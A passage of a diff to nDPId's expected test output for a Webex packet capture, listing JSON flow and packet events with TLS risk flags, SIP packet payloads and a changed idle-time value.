+01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1444570637191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570637191,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1444570638237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570638237,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1444570639266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570639266,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgW